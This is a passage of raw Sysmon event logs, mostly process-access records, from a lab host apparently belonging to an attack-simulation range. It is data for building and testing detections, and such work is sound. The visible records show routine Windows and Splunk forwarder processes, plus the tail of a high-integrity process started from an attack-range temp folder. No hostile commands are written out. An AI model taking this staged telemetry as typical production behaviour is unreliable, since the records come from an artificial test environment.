C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=68970B2CD5430C812BEF5B87C1ADD6EA,SHA256=E4E1E3C44E01C60FD433C6283BD8CD15A9941E1CBAAD72E6409CC92E2E91263E,IMPHASH=DA1C2D7ACFE54DF797BFB1F470257BC3{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000217383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1279-6216-7804-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1279-6216-7804-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.853{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1279-6216-7804-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.854{4F8D34B0-1279-6216-7804-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.665{4F8D34B0-1279-6216-7704-000000003902}22923196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1279-6216-7704-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1279-6216-7704-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:49.353{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1279-6216-7704-000000003902}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 